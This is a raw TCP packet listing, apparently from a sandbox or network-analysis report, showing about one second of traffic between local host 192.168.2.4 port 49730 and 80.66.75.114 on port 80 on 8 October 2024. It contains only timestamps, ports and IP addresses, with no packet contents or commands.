                                                            Oct 8, 2024 10:08:38.298516035 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.298563004 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.298605919 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.298615932 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.298624992 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.298650026 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.298675060 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.440593004 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.440663099 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.440697908 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.440731049 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.440752029 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.440766096 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.440788031 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.440799952 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.440824986 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.440843105 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.440851927 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.440886021 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.440907955 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.440918922 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.440941095 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.440952063 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.440963030 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.440999985 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.441005945 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.441037893 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.441055059 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.441071987 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.441088915 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.441104889 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.441128969 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.441148996 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.441155910 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.441188097 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.441204071 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.441226006 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.441236019 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.441257954 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.441273928 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.441292048 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.441310883 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.441324949 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.441344976 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.441358089 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.441380024 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.441397905 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.441401958 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.441446066 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.441679955 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.441740990 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.565191031 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.565215111 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.565224886 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.565275908 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.565287113 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.565298080 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.565380096 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.565380096 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.565552950 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.565565109 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.565576077 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.565586090 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.565592051 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.565603018 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.565613985 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.565617085 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.565623999 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.565639019 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.565664053 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.565692902 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.565890074 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.565901995 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.565912008 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.565947056 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.565980911 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.566063881 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.566076040 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.566086054 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.566097021 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.566124916 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.566154957 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.566191912 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.566203117 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.566214085 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.566247940 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.566278934 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.566782951 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.566793919 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.566803932 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.566840887 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.566870928 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.566936016 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.566989899 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.566992998 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.567001104 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.567013025 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.567023039 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.567039967 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.567070007 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.567097902 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.699902058 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.699954987 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.700014114 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.700047970 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.700083017 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.700100899 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.700134993 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.700154066 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.700154066 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.700171947 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.700187922 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.700206041 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.700227976 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.700239897 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.700287104 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.700287104 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.700290918 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.700325966 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.700344086 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.700360060 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.700387001 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.700395107 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.700407982 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.700428009 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.700452089 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.700460911 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.700472116 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.700494051 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.700512886 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.700534105 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.700546026 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.700567007 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.700592041 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.700599909 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.700614929 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.700634003 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.700649023 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.700669050 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.700684071 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.700723886 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.701004028 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.701036930 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.701069117 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.701070070 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.701090097 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.701101065 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.701112986 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.701143980 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.701153994 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.701175928 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.701193094 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.701210976 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.701231956 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.701246023 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.701256990 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.701303005 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.790251970 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.790337086 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.839868069 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.839920998 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.839951038 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.839986086 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.840006113 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.840020895 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.840030909 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.840056896 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.840073109 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.840090990 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.840107918 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.840126991 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.840140104 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.840161085 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.840178013 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.840197086 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.840210915 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.840229988 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.840251923 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.840264082 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.840279102 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.840297937 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.840316057 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.840331078 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.840352058 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.840364933 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.840384960 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.840399027 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.840416908 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.840430975 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.840442896 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.840466022 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.840482950 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.840503931 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.840512037 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.840555906 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.840711117 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.840760946 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.840764046 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.840811014 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.840817928 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.840847969 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.840864897 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.840882063 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.840900898 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.840914011 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.840929985 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.840961933 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.840966940 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.841005087 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.841018915 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.841038942 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.841053009 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.841072083 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.841089964 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.841106892 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.841118097 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.841140985 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.841156006 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.841191053 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.978537083 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.978590965 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.978602886 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.978704929 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.978718042 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.978729963 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.978740931 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.978751898 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.978766918 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.978766918 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.978787899 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.978821039 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.978821039 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.979130030 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.979183912 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.979196072 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.979221106 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.979238987 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.979254961 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.979278088 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.979288101 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.979311943 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.979321003 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.979334116 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.979355097 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.979373932 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.979413986 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.979414940 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.979449987 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.979474068 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.979482889 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.979495049 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.979537964 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.979655027 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.979687929 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.979717016 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.979737997 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.979739904 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.979773045 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.979799032 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.979806900 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.979816914 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.979839087 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.979856968 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.979875088 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.979890108 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.979926109 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.979931116 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.979959965 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.979984999 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.979996920 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.980003119 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.980041981 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.981276989 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.981312037 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.981340885 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.981348038 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:38.981359959 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:38.981395960 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.112526894 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.112696886 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.112705946 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.112730980 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.112765074 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.112766027 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.112785101 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.112796068 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.112813950 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.112838984 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.112849951 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.112868071 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.112890005 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.112915993 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.112920046 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.112950087 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.112965107 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.113007069 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.113027096 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.113040924 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.113061905 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.113073111 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.113094091 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.113106012 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.113128901 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.113140106 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.113151073 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.113173008 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.113192081 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.113220930 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.113410950 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.113442898 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.113468885 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.113493919 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.113594055 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.113626003 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.113642931 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.113660097 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.113678932 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.113692999 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.113711119 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.113727093 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.113745928 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.113775969 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.113778114 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.113806963 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.113826990 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.113842010 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.113862038 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.113873005 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.113945961 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.113974094 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.113977909 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.114007950 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.114027977 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.114039898 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.114063025 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.114073992 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.114092112 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.114106894 CEST804973080.66.75.114192.168.2.4
                                                            Oct 8, 2024 10:08:39.114125013 CEST4973080192.168.2.480.66.75.114
                                                            Oct 8, 2024 10:08:39.114141941 CEST804973080.66.75.114192.168.2.4
